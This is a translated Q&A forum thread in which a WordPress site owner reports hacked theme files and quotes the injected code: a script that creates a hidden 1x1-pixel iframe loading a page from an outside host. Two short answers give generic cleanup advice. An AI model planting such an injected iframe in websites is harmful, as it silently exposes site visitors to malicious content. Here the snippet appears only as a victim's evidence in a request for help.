Wordpress黑客注入javascript / iframes

时间:2012-12-12 17:14:26

标签: wordpress virus

我的(Wordpress)网站似乎被黑了,代码被添加到主index.php文件,主题index.php文件和主题header.php文件。

这部分来自header.php

#f524d6#
<script type=\"text/javascript\" language=\"javascript\" >
(function () {    var kilun = document.createElement('iframe');    kilun.src = 'http://hosting3081247.az.pl/cgi-bin/counter.php';    kilun.style.position = 'absolute';    kilun.style.border = '0';    kilun.style.height = '1px';    kilun.style.width = '1px';    kilun.style.left = '1px';    kilun.style.top = '1px';    if (!document.getElementById('kilun')) {        document.write('<div id=\'kilun\'></div>');        document.getElementById('kilun').appendChild(kilun);    }})();</script>";
#/f524d6#

有人可以告诉我如何删除它吗?它在删除代码行后返回。

2 个答案:

答案 0 :(得分:1)

如果你在普通的html / php页面上找到这个 - 不仅仅是在wordpress内 - 那么它可能是一个解析服务器上所有文件的脚本(即不是wp hack),在这种情况下最好更改服务器的用户名和密码(以及wordpress):ftp,shell等。

答案 1 :(得分:-1)

  • 以最低权限更改文件夹和文件。
  • 保护您的.htaccess
  • 检查文件夹所有权。
  • 更改所有密码并创建更难的密码。